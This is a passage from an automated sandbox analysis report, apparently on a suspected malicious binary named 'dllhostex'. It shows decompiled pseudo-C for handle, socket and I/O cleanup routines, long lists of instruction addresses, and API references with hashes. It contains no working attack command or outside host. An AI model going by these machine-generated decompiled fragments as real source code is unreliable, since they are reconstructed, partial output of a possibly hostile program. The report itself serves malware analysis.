								__edx = __esi;
								__ecx = __ecx | 0x00000001;
								__eflags = __ecx;
								 *(__esi + 0x2c) = __ecx;
								__ecx = __edi;
								__eax = E0133C0C0(__edi, __esi);
								goto L52;
							case 0xc:
								__eax =  *(__esi + 0x18);
								__eflags = __eax - 0xffffffff;
								if(__eax != 0xffffffff) {
									__eax = E0135FF6B(__eax);
								} else {
									__eax = CloseHandle( *(__esi + 0x90));
								}
								__ecx =  *(__esi + 0x2c);
								__eflags = __ecx & 0x00001000;
								if((__ecx & 0x00001000) != 0) {
									__ecx = __esi;
									__eax = E0133D720(__ebx, __esi, __edx, __edi, __ebp);
									__ecx =  *(__esi + 0x2c);
								}
								__ecx = __ecx & 0xffff3fff;
								 *(__esi + 0x18) = 0xffffffff;
								__eax = __ecx;
								 *(__esi + 0x90) = 0xffffffff;
								__eax = __ecx & 0x0000000c;
								 *(__esi + 0x2c) = __ecx;
								__eflags = __al - 0xc;
								if(__al != 0xc) {
									__eax =  *(__esi + 4);
									_t66 = __eax + 4;
									 *_t66 =  *(__eax + 4) + 1;
									__eflags =  *_t66;
									__ecx =  *(__esi + 0x2c);
								}
								__ecx = __ecx & 0xfffffffb;
								__ecx = __ecx | 0x00000001;
								__eflags =  *(__esi + 0x3c);
								 *(__esi + 0x2c) = __ecx;
								if( *(__esi + 0x3c) != 0) {
									goto L52;
								} else {
									__edx =  *(__esi + 4);
									__eflags = __cl & 0x00000020;
									if((__cl & 0x00000020) != 0) {
										goto L52;
									} else {
										__ecx = __ecx | 0x00000020;
										__eflags = __ecx;
										 *(__esi + 0x2c) = __ecx;
										__eax =  *(__edx + 0x2c);
										 *(__esi + 0x28) = __eax;
										 *(__edx + 0x2c) = __esi;
										_pop(__edi);
										_pop(__esi);
										__esp = __ebp;
										_pop(__ebp);
										return __eax;
									}
								}
								goto L97;
							case 0xd:
								__eflags = __eax - 0xf;
								if(__eax == 0xf) {
									__eflags = __ecx & 0x00001000;
									if((__ecx & 0x00001000) != 0) {
										 *(__esi + 0x2c) = __ecx;
										 *((intOrPtr*)(__edi + 0x5c)) =  *((intOrPtr*)(__edi + 0x5c)) - 1;
										_t83 = __esi + 0x40;
										 *_t83 = 0xffffffff +  *(__esi + 0x40);
										__eflags =  *_t83;
										if( *_t83 == 0) {
											__eax =  *(__esi + 0x2c);
											__eflags = __al & 0x00000001;
											if((__al & 0x00000001) == 0) {
												__eflags = __al & 0x00000004;
												if((__al & 0x00000004) != 0) {
													 *(__esi + 0x2c) = __eax;
													__eflags = __al & 0x00000008;
													if((__al & 0x00000008) != 0) {
														__eax =  *(__esi + 4);
														_t94 = __eax + 4;
														 *_t94 =  *(__eax + 4) - 1;
														__eflags =  *_t94;
													}
												}
											}
										}
									}
								}
								_push( *(__esi + 0x38));
								__imp__#3();
								__ecx =  *(__esi + 0x2c);
								__ecx = __ecx & 0x0000000c;
								 *(__esi + 0x38) = 0xffffffff;
								__eflags = __al - 0xc;
								if(__al != 0xc) {
									__eax =  *(__esi + 4);
									_t100 = __eax + 4;
									 *_t100 =  *(__eax + 4) + 1;
									__eflags =  *_t100;
									__ecx =  *(__esi + 0x2c);
								}
								__ecx = __ecx & 0xfffffffb;
								__ecx = __ecx | 0x00000001;
								__eflags =  *(__esi + 0x3c);
								goto L43;
							case 0xe:
								__ecx = __esi;
								__eax = E01341500();
								__ecx =  *(__esi + 0x2c);
								__ecx = __ecx & 0x0000000c;
								__eflags = __al - 0xc;
								if(__al != 0xc) {
									__eax =  *(__esi + 4);
									_t166 = __eax + 4;
									 *_t166 =  *(__eax + 4) + 1;
									__eflags =  *_t166;
									__ecx =  *(__esi + 0x2c);
								}
								__ecx = __ecx & 0xfffffffb;
								__ecx = __ecx | 0x00000001;
								__eflags =  *(__esi + 0x84);
								L43:
								 *(__esi + 0x2c) = __ecx;
								if(__eflags != 0) {
									goto L52;
								} else {
									__eflags = __cl & 0x00000020;
									if((__cl & 0x00000020) != 0) {
										goto L52;
									} else {
										__ecx = __ecx | 0x00000020;
										__eflags = __ecx;
										 *(__esi + 0x2c) = __ecx;
										__eax =  *(__edi + 0x2c);
										 *(__esi + 0x28) = __eax;
										 *(__edi + 0x2c) = __esi;
										_pop(__edi);
										_pop(__esi);
										__esp = __ebp;
										_pop(__ebp);
										return __eax;
									}
								}
								goto L97;
						}
					}
				}
				L97:
			}







                                                0x01341700
                                                0x01341707
                                                0x0134170a
                                                0x0134170d
                                                0x01341713
                                                0x01341948
                                                0x0134194d
                                                0x01341719
                                                0x0134171c
                                                0x0134171f
                                                0x01341725
                                                0x01341af8
                                                0x01341af8
                                                0x00000000
                                                0x0134172b
                                                0x0134172b
                                                0x00000000
                                                0x013419dc
                                                0x013419e0
                                                0x013419e6
                                                0x013419e9
                                                0x013419eb
                                                0x013419f4
                                                0x013419f7
                                                0x013419fa
                                                0x013419fd
                                                0x013419fd
                                                0x013419eb
                                                0x00000000
                                                0x00000000
                                                0x0134199e
                                                0x013419a1
                                                0x00000000
                                                0x013419a3
                                                0x013419a3
                                                0x013419a6
                                                0x013419a8
                                                0x013419ab
                                                0x013419ab
                                                0x013419ae
                                                0x013419b1
                                                0x013419b3
                                                0x013419b6
                                                0x013419b6
                                                0x00000000
                                                0x013419b1
                                                0x00000000
                                                0x00000000
                                                0x01341a98
                                                0x01341a9a
                                                0x01341a9f
                                                0x01341aa4
                                                0x01341aa7
                                                0x01341aa9
                                                0x01341aab
                                                0x01341aae
                                                0x01341aae
                                                0x01341aae
                                                0x01341ab1
                                                0x01341ab1
                                                0x01341ab4
                                                0x01341ab7
                                                0x01341aba
                                                0x00000000
                                                0x00000000
                                                0x01341ac3
                                                0x01341ac6
                                                0x00000000
                                                0x01341acc
                                                0x01341acc
                                                0x01341acf
                                                0x01341ad5
                                                0x01341adc
                                                0x01341ae0
                                                0x01341ae6
                                                0x01341ae9
                                                0x01341aee
                                                0x01341aee
                                                0x00000000
                                                0x01341ae0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013419bb
                                                0x013419be
                                                0x00000000
                                                0x013419c4
                                                0x013419c4
                                                0x013419c7
                                                0x013419c9
                                                0x013419cc
                                                0x013419cc
                                                0x013419cf
                                                0x013419d2
                                                0x013419d4
                                                0x013419d7
                                                0x013419d7
                                                0x00000000
                                                0x013419d2
                                                0x00000000
                                                0x00000000
                                                0x0134173f
                                                0x01341745
                                                0x01341747
                                                0x0134174d
                                                0x0134174d
                                                0x0134174d
                                                0x01341751
                                                0x01341753
                                                0x01341756
                                                0x01341758
                                                0x0134175a
                                                0x0134175d
                                                0x0134175f
                                                0x01341761
                                                0x01341763
                                                0x01341766
                                                0x01341769
                                                0x0134176c
                                                0x0134176e
                                                0x0134176e
                                                0x0134176e
                                                0x01341771
                                                0x01341771
                                                0x0134176c
                                                0x01341761
                                                0x0134175d
                                                0x01341758
                                                0x01341774
                                                0x01341777
                                                0x0134177b
                                                0x0134177e
                                                0x0134177e
                                                0x0134177e
                                                0x01341782
                                                0x01341785
                                                0x01341787
                                                0x01341789
                                                0x0134178b
                                                0x0134178e
                                                0x01341793
                                                0x01341796
                                                0x01341799
                                                0x0134179b
                                                0x0134179e
                                                0x0134179e
                                                0x0134179e
                                                0x0134179e
                                                0x01341799
                                                0x0134178e
                                                0x01341789
                                                0x01341785
                                                0x013417a1
                                                0x013417a3
                                                0x013417a8
                                                0x013417ac
                                                0x013417ae
                                                0x013417b1
                                                0x013417b3
                                                0x013417b5
                                                0x013417b5
                                                0x013417b8
                                                0x013417bb
                                                0x013417be
                                                0x013417c1
                                                0x013417c1
                                                0x013417b3
                                                0x013417c4
                                                0x013417c4
                                                0x013417c4
                                                0x013417cb
                                                0x013417cb
                                                0x013417ce
                                                0x013417d0
                                                0x013417d3
                                                0x013417d5
                                                0x013417d7
                                                0x013417da
                                                0x013417da
                                                0x013417da
                                                0x013417dd
                                                0x013417dd
                                                0x013417e0
                                                0x013417e3
                                                0x013417e3
                                                0x013417e6
                                                0x013417e9
                                                0x013417ea
                                                0x013417eb
                                                0x013417ed
                                                0x013417ee
                                                0x00000000
                                                0x00000000
                                                0x0134190b
                                                0x0134190d
                                                0x0134190f
                                                0x01341914
                                                0x01341915
                                                0x01341916
                                                0x01341918
                                                0x01341919
                                                0x00000000
                                                0x00000000
                                                0x0134194e
                                                0x01341951
                                                0x00000000
                                                0x01341953
                                                0x01341953
                                                0x01341956
                                                0x01341958
                                                0x0134195b
                                                0x0134195b
                                                0x0134195e
                                                0x01341961
                                                0x01341963
                                                0x01341966
                                                0x01341966
                                                0x01341969
                                                0x01341969
                                                0x0134196c
                                                0x0134196e
                                                0x01341970
                                                0x01341973
                                                0x01341973
                                                0x01341976
                                                0x01341979
                                                0x0134197b
                                                0x0134197d
                                                0x01341980
                                                0x01341980
                                                0x01341983
                                                0x01341983
                                                0x01341986
                                                0x01341989
                                                0x00000000
                                                0x0134198b
                                                0x0134198b
                                                0x0134198e
                                                0x01341991
                                                0x01341994
                                                0x00000000
                                                0x01341996
                                                0x01341996
                                                0x01341999
                                                0x00000000
                                                0x01341999
                                                0x01341994
                                                0x01341989
                                                0x00000000
                                                0x00000000
                                                0x01341a35
                                                0x01341a38
                                                0x01341a3a
                                                0x01341a3c
                                                0x01341a3c
                                                0x01341a3c
                                                0x01341a3f
                                                0x01341a3f
                                                0x01341a42
                                                0x01341a45
                                                0x01341a48
                                                0x01341a4b
                                                0x01341a4e
                                                0x01341a51
                                                0x01341a6b
                                                0x01341a6b
                                                0x01341a72
                                                0x00000000
                                                0x01341a78
                                                0x01341a78
                                                0x01341a7b
                                                0x01341a7d
                                                0x00000000
                                                0x01341a83
                                                0x01341a83
                                                0x01341a83
                                                0x01341a86
                                                0x01341a89
                                                0x01341a8c
                                                0x01341a8f
                                                0x01341a92
                                                0x01341a93
                                                0x01341a94
                                                0x01341a96
                                                0x01341a97
                                                0x01341a97
                                                0x01341a7d
                                                0x01341a53
                                                0x01341a53
                                                0x01341a55
                                                0x01341a56
                                                0x01341a5c
                                                0x01341a5e
                                                0x01341afd
                                                0x01341b0a
                                                0x01341b10
                                                0x01341b12
                                                0x01341b12
                                                0x01341b14
                                                0x01341b15
                                                0x01341b19
                                                0x01341b1c
                                                0x01341a64
                                                0x01341a64
                                                0x00000000
                                                0x01341a64
                                                0x01341a5e
                                                0x00000000
                                                0x00000000
                                                0x0134173e
                                                0x00000000
                                                0x00000000
                                                0x0134191a
                                                0x0134191c
                                                0x01341921
                                                0x01341921
                                                0x01341924
                                                0x01341926
                                                0x01341929
                                                0x0134192b
                                                0x0134192d
                                                0x01341930
                                                0x01341930
                                                0x01341930
                                                0x01341933
                                                0x01341933
                                                0x01341936
                                                0x01341939
                                                0x0134193b
                                                0x0134193b
                                                0x0134193e
                                                0x01341941
                                                0x01341943
                                                0x00000000
                                                0x00000000
                                                0x013417ef
                                                0x013417f2
                                                0x013417f5
                                                0x01341806
                                                0x013417f7
                                                0x013417fd
                                                0x013417fd
                                                0x0134180e
                                                0x01341811
                                                0x01341817
                                                0x01341819
                                                0x0134181b
                                                0x01341820
                                                0x01341820
                                                0x01341823
                                                0x01341829
                                                0x01341830
                                                0x01341832
                                                0x0134183c
                                                0x0134183f
                                                0x01341842
                                                0x01341844
                                                0x01341846
                                                0x01341849
                                                0x01341849
                                                0x01341849
                                                0x0134184c
                                                0x0134184c
                                                0x0134184f
                                                0x01341852
                                                0x01341855
                                                0x01341859
                                                0x0134185c
                                                0x00000000
                                                0x01341862
                                                0x01341862
                                                0x01341865
                                                0x01341868
                                                0x00000000
                                                0x0134186e
                                                0x0134186e
                                                0x0134186e
                                                0x01341871
                                                0x01341874
                                                0x01341877
                                                0x0134187a
                                                0x0134187d
                                                0x0134187e
                                                0x0134187f
                                                0x01341881
                                                0x01341882
                                                0x01341882
                                                0x01341868
                                                0x00000000
                                                0x00000000
                                                0x01341883
                                                0x01341886
                                                0x01341888
                                                0x0134188e
                                                0x01341896
                                                0x01341899
                                                0x0134189c
                                                0x0134189c
                                                0x0134189c
                                                0x013418a0
                                                0x013418a2
                                                0x013418a5
                                                0x013418a7
                                                0x013418a9
                                                0x013418ab
                                                0x013418b0
                                                0x013418b3
                                                0x013418b5
                                                0x013418b7
                                                0x013418ba
                                                0x013418ba
                                                0x013418ba
                                                0x013418ba
                                                0x013418b5
                                                0x013418ab
                                                0x013418a7
                                                0x013418a0
                                                0x0134188e
                                                0x013418bd
                                                0x013418c0
                                                0x013418c6
                                                0x013418cb
                                                0x013418ce
                                                0x013418d5
                                                0x013418d7
                                                0x013418d9
                                                0x013418dc
                                                0x013418dc
                                                0x013418dc
                                                0x013418df
                                                0x013418df
                                                0x013418e2
                                                0x013418e5
                                                0x013418e8
                                                0x00000000
                                                0x00000000
                                                0x01341a05
                                                0x01341a07
                                                0x01341a0c
                                                0x01341a11
                                                0x01341a14
                                                0x01341a16
                                                0x01341a18
                                                0x01341a1b
                                                0x01341a1b
                                                0x01341a1b
                                                0x01341a1e
                                                0x01341a1e
                                                0x01341a21
                                                0x01341a24
                                                0x01341a27
                                                0x013418ec
                                                0x013418ec
                                                0x013418ef
                                                0x00000000
                                                0x013418f1
                                                0x013418f1
                                                0x013418f4
                                                0x00000000
                                                0x013418f6
                                                0x013418f6
                                                0x013418f6
                                                0x013418f9
                                                0x013418fc
                                                0x013418ff
                                                0x01341902
                                                0x01341905
                                                0x01341906
                                                0x01341907
                                                0x01341909
                                                0x0134190a
                                                0x0134190a
                                                0x013418f4
                                                0x00000000
                                                0x00000000
                                                0x0134172b
                                                0x01341725
                                                0x00000000

                                                APIs
                                                • CloseHandle.KERNEL32(?), ref: 013417FD
                                                • closesocket.WS2_32(?), ref: 013418C0
                                                • UnregisterWaitEx.KERNEL32(?,000000FF), ref: 01341A56
                                                • GetLastError.KERNEL32(?,013C2220,?,013752AC,4132269F), ref: 01341AFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseErrorHandleLastUnregisterWaitclosesocket
                                                • String ID: UnregisterWaitEx
                                                • API String ID: 4091028079-3194662728
                                                • Opcode ID: 3e8b773d14e9267addda8b9f18486c5616dd8bffe07d7cf41726eebfa74b850c
                                                • Instruction ID: 4381fd5528cd04a0bdb8240c3d82751f3e0ad261345455f457187efce907042b
                                                • Opcode Fuzzy Hash: 3e8b773d14e9267addda8b9f18486c5616dd8bffe07d7cf41726eebfa74b850c
                                                • Instruction Fuzzy Hash: 3BD11A75600F058FE7358B2DC555762BBE0FB48769B048B1EEAAB86A91D730F481CF84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134B1F0 Relevance: 9.1, APIs: 6, Instructions: 92networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B21B
                                                • recv.WS2_32(?,?,00000004,00000000), ref: 0134B236
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B256
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B29B
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B2A4
                                                • __WSAFDIsSet.WS2_32(?,00000000), ref: 0134B2B1
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: 27bc722045755ffb1c35a058c9ceaf19e0754d4d25e0d1a1c0bf2762958dc327
                                                • Instruction ID: dd6acb3fdeca769c70ca3fb23c50ffa05043ca8d5d37a52da07cb7eee47f604c
                                                • Opcode Fuzzy Hash: 27bc722045755ffb1c35a058c9ceaf19e0754d4d25e0d1a1c0bf2762958dc327
                                                • Instruction Fuzzy Hash: 9431BF716043065FE720AF29DC80B6FBBE8AF84724F044A28FD5987295D730ED198BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01346C40 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E01346C40(void* __ecx) {
				signed int _t17;
				intOrPtr _t18;
				void* _t21;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				struct _CRITICAL_SECTION* _t33;

				_t31 = __ecx;
				_t27 =  *(__ecx + 0x2c);
				_t17 = _t27 & 0x00210000;
				if(_t17 != 0x10000) {
					L11:
					return _t17;
				} else {
					_t26 =  *((intOrPtr*)(__ecx + 0x94));
					if(_t26 == 0xffffffff) {
						goto L11;
					} else {
						if((_t27 & 0x01000000) != 0) {
							_t33 = __ecx + 0x120;
							EnterCriticalSection(_t33);
							_t18 =  *((intOrPtr*)(_t31 + 0x138));
							if(_t18 != 0) {
								if(_t18 == 0xffffffff) {
									L10:
									LeaveCriticalSection(_t33);
									 *(_t31 + 0x2c) =  *(_t31 + 0x2c) | 0x00200000;
									return _t18;
								}
								_t29 = __imp__CancelSynchronousIo;
								do {
									 *_t29(_t18);
									SwitchToThread();
									_t18 =  *((intOrPtr*)(_t31 + 0x138));
								} while (_t18 != 0xffffffff);
								goto L10;
							}
							 *((intOrPtr*)(_t31 + 0x138)) = 0xffffffff;
							LeaveCriticalSection(_t33);
							 *(_t31 + 0x2c) =  *(_t31 + 0x2c) | 0x00200000;
							return _t18;
						} else {
							_t21 = __ecx + 0x64;
							__imp__CancelIoEx(_t26, _t21);
							 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0x00200000;
							return _t21;
						}
					}
				}
			}











                                                0x01346c41
                                                0x01346c43
                                                0x01346c48
                                                0x01346c52
                                                0x01346cf2
                                                0x01346cf2
                                                0x01346c58
                                                0x01346c58
                                                0x01346c61
                                                0x00000000
                                                0x01346c67
                                                0x01346c6d
                                                0x01346c84
                                                0x01346c8b
                                                0x01346c91
                                                0x01346c99
                                                0x01346cb9
                                                0x01346ce2
                                                0x01346ce3
                                                0x01346ce9
                                                0x00000000
                                                0x01346cf0
                                                0x01346cc3
                                                0x01346cd0
                                                0x01346cd1
                                                0x01346cd3
                                                0x01346cd5
                                                0x01346cdb
                                                0x00000000
                                                0x01346ce1
                                                0x01346c9c
                                                0x01346ca6
                                                0x01346cac
                                                0x01346cb5
                                                0x01346c6f
                                                0x01346c6f
                                                0x01346c74
                                                0x01346c7a
                                                0x01346c82
                                                0x01346c82
                                                0x01346c6d
                                                0x01346c61

                                                APIs
                                                • CancelIoEx.KERNEL32(?,?,?,01346D0D,00000000,?,?,?,013417A8), ref: 01346C74
                                                • EnterCriticalSection.KERNEL32(?,?,?,01346D0D,00000000,?,?,?,013417A8), ref: 01346C8B
                                                • LeaveCriticalSection.KERNEL32 ref: 01346CA6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CancelEnterLeave
                                                • String ID:
                                                • API String ID: 4260397832-0
                                                • Opcode ID: 8444680fd205546990b33749f2459acfdc8714e80d1cd55b70c8869d443f62d3
                                                • Instruction ID: d07c162f85e381ac90bee4a8410f9cbea84605a879e74d0577022e543b252507
                                                • Opcode Fuzzy Hash: 8444680fd205546990b33749f2459acfdc8714e80d1cd55b70c8869d443f62d3
                                                • Instruction Fuzzy Hash: A1117C715007048FD7749B38E889BE6B3EDEB4A335F504B29F5AAC25C5C730B8828B14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013632D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01363284,?,?,0136324C,?,?), ref: 013632F3
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01363306
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,01363284,?,?,0136324C,?,?), ref: 01363329
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 726263ef57f86391bea171461751a6ec824e81e65028bfdfcb1bd988543085f3
                                                • Instruction ID: e0234567ec2d44069bfbe2b099ac5c2bfcc711c2351169738defc2e6d3b92fb9
                                                • Opcode Fuzzy Hash: 726263ef57f86391bea171461751a6ec824e81e65028bfdfcb1bd988543085f3
                                                • Instruction Fuzzy Hash: B2F0AF31A00218BBDB219FA5D849BAEBFBCFF08715F4041A8F909A2254EF349D40CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01363A4E Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E01363A4E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x13cc074; // 0x4132269f
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0135B5BD( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E013537BE(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E013537BE(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E013537BE(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0136DC7E(_t56);
						_t40 = E013656E2(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0136DC7E(_t56);
						E013656E2(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x13cc074;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                0x01363a4e
                                                0x01363a58
                                                0x01363a5c
                                                0x01363a5e
                                                0x01363a62
                                                0x01363a6c
                                                0x01363a7d
                                                0x01363a82
                                                0x01363a84
                                                0x01363a86
                                                0x01363a88
                                                0x01363a8a
                                                0x01363a8e
                                                0x01363b48
                                                0x01363b56
                                                0x01363b58
                                                0x01363b5d
                                                0x01363b64
                                                0x01363b66
                                                0x01363b74
                                                0x01363b83
                                                0x01363b86
                                                0x01363b88
                                                0x00000000
                                                0x01363b89
                                                0x01363a96
                                                0x01363a9b
                                                0x01363aa0
                                                0x01363aa2
                                                0x01363aa2
                                                0x01363aa4
                                                0x01363aa9
                                                0x01363aad
                                                0x01363aad
                                                0x01363ab0
                                                0x01363acf
                                                0x01363acf
                                                0x01363ad1
                                                0x01363ad4
                                                0x01363add
                                                0x01363ae0
                                                0x01363ae5
                                                0x01363ae8
                                                0x01363aed
                                                0x00000000
                                                0x00000000
                                                0x01363aef
                                                0x00000000
                                                0x01363ab2
                                                0x01363ab2
                                                0x01363ab4
                                                0x01363abd
                                                0x01363ac0
                                                0x01363ac5
                                                0x01363ac8
                                                0x01363acd
                                                0x01363af7
                                                0x01363afa
                                                0x01363afc
                                                0x01363aff
                                                0x01363b07
                                                0x01363b0d
                                                0x01363b14
                                                0x01363b16
                                                0x01363b1e
                                                0x01363b2d
                                                0x01363b31
                                                0x01363b33
                                                0x01363b36
                                                0x00000000
                                                0x00000000
                                                0x01363b38
                                                0x01363b3b
                                                0x01363b3d
                                                0x01363b3d
                                                0x01363b3e
                                                0x01363b40
                                                0x01363b43
                                                0x00000000
                                                0x01363b3d
                                                0x00000000
                                                0x01363acd
                                                0x01363ab0
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
